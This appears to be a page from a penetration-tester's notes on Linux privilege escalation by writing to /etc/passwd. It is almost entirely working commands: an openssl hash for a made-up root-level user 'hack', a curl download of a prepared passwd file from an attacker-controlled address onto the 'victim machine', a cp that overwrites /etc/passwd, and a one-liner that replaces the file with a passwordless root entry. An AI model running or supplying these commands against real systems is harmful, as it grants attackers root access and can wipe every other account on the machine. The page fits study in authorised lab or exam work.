Writing /etc/passwd

Create a root user

/etc/passwd takes precedence over /etc/shadow. To place a password in /etc/passwd:

# create a hashed password
	openssl passwd -1 -salt hack pass123

# Create user in passwd file with root permissions
	hack:$1$hack$22.CgYt2uMolqeatCk9ih/:0:0:root:/root:/bin/bash

# Transfer new /etc/passwd file to victim machine:
	curl -o passwordy http://192.168.119.134:8000/passwordy

# replace /etc/passwd on victim machine
	cp passwordy /etc/passwd

# su to user named "hack" which is the new root user

You may be able to gain root by just echoing a single line to /etc/passwd, as below:

One liner for /etc/passwd with write-access to /etc/passwd

echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd

PreviousFile Transfers NextTips & Tricks

Last updated 4 years ago

Was this helpful?